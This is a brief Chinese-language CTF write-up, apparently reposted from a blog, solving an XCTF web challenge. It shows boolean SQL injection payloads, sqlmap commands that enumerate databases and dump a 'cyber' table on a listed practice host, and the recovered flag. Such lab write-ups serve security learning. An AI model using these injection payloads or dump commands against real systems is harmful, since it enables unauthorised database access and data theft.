赞
踩
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html
目录
?id=1' and 1=1-- -
?id=1' and 1=2-- -
?id=1' or 1=2-- -
都均无回显
?id=1' or 1=1-- -
回显出flag
Please enter ID,and Try to bypass
nice : congratulations
Flag Is : cyberpeace{76d13a6f794e1946a69a955eeb3d688d}
sqlmap下载地址:http://sqlmap.org
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -dbs
查看cyber表中数据
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -T cyber --dump
cyberpeace{76d13a6f794e1946a69a955eeb3d688d}
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。